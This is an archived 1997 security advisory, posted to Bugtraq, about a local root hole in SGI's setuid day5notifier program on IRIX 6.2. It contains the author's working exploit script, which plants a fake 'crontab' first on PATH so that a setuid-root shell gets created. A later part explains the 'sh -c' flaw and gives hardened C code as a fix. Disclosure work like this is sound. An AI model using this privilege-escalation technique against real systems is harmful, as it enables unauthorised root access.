IRIX day5notifier hole
Description: Hehe, the good folks at SGI apparently tried to avoid the system() call security problems by using execve("/sbin/sh", "sh", "-c", "command..."). Ha!
Author: Mike Neuman <mcn@RIPOSTE.ENGARDE.COM>
Compromise: root (local)
Vulnerable Systems: IRIX 6.2
Date: Mike reported it on 6 August 1996, but they apparently didn't get around to fixing it.
Date: Fri, 16 May 1997 11:25:35 -0600
From: Mike Neuman <mcn@RIPOSTE.ENGARDE.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: Day5notifier (IRIX 6.2 vulnerability)
This message was sent nearly a year ago to SGI, and their customer support
people still claim to have never heard of it. It only works on 6.2 (as far as
I know), but 6.2 is still the only OS available for Indys. It also points
out a flaw in quite a few other SGI programs. Apparently an engineer read
the "How not to use the system() call", and made up his own alternative. :-)
=====
To: security-alert@sgi.com
Subject: Vulnerability in IRIX 6.2
Date: Tue, 06 Aug 1996 18:29:38 -0600
Hello!
This afternoon I decided to take a close look at some of the setuid
executables running on my IRIX 6.2 system. An hour later, I have at least
one major problem to report. :-) I've enclosed the exploit script below,
which contains a lengthy explanation at the top of the vulnerability and
why it exists.
If you have any questions, please feel free to contact me!
-Mike Neuman
mcn@EnGarde.com
-----
#!/bin/sh
# reg4root - Register me for Root!
#
# Exploit a bug in SGI's Registration Software
#
# -Mike Neuman
# mcn@EnGarde.com
# 8/6/96
#
# The bug is contained within the /var/www/htdocs/WhatsNew/CustReg/day5notifier
# program, apparently installed by default under IRIX 6.2. It may appear in
# the other setuid root program (day5datacopier) there, but I haven't had the
# time to check.
#
# SGI is apparently trying to do the right thing (by using execv() instead of
# system()), but apparently some engineer decided that execv() was too limited
# in capabilities, so he/she translated system() to:
#
# execve("/sbin/sh", "sh", "-c", "command...")
#
# This completely eliminates any security benefits execv() had!
#
# The program probably should not be setuid root. There are at least another
# dozen potential security vulnerabilities (i.e. _RLD_* variables, race
# conditions, etc.) found just by looking at strings.
#
# Note crontab and ps are only two of the problems. There are probably others.
MYPWD=`pwd`
mkdir /tmp/emptydir.$$
cd /tmp/emptydir.$$
cat <<EOF >crontab
cp /bin/sh ./suidshell
chmod 4755 suidshell
EOF
chmod +x crontab
PATH=.:$PATH
export PATH
/var/www/htdocs/WhatsNew/CustReg/day5notifier -procs 0
./suidshell
cd $MYPWD
rm -rf /tmp/emptydir.$$
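The flaw above is that "sh -c" hands command-name resolution back to a shell that honours the caller's PATH (and the rest of the inherited environment), which is exactly what execv() with a fixed path was supposed to avoid. The following is an added illustration, not SGI's code and not part of Mike's post: the unsafe pattern as the advisory describes it, beside a hardened replacement that a setuid program could use instead. Only "/sbin/sh" comes from the page; the function names, the fixed environment and the use of Linux/POSIX fork/execve are assumptions.

```c
/* Added example (hypothetical code, not from day5notifier): the anti-pattern
 * from the advisory next to a hardened way for a setuid program to run a
 * helper such as crontab or ps. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* The advisory's anti-pattern: the shell resolves "crontab" through whatever
 * PATH the (unprivileged) caller exported, so "sh -c" gives back everything
 * that calling execv() on a fixed path had taken away. Shown for contrast only. */
void run_via_shell_UNSAFE(const char *cmd) {
    char *const argv[] = {"sh", "-c", (char *)cmd, NULL};
    execv("/sbin/sh", argv);        /* inherits the attacker-controlled environment */
}

/* Hardened: no shell, absolute program path only, a fixed minimal environment
 * (so PATH=.:..., IFS, _RLD_* and friends never reach the child), and root
 * dropped in the child unless the helper really needs it.
 * Returns the child's exit status, or -1 if the request was refused or failed. */
int run_fixed_command(const char *path, char *const argv[], int keep_root) {
    static char *const safe_env[] = {"PATH=/usr/bin:/bin", NULL};
    if (path == NULL || path[0] != '/' || strstr(path, "/../") != NULL)
        return -1;                  /* never let PATH lookup or traversal decide */
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (!keep_root && setuid(getuid()) != 0)
            _exit(127);             /* refuse to run privileged if the drop fails */
        execve(path, argv, safe_env);
        _exit(127);                 /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) != pid)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    char *const argv[] = {"crontab", "-l", NULL};
    /* A bare "crontab" is rejected instead of being looked up via PATH. */
    printf("relative name -> %d\n", run_fixed_command("crontab", argv, 0));
    return 0;
}
```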
This page is part of Fyodor's exploit world.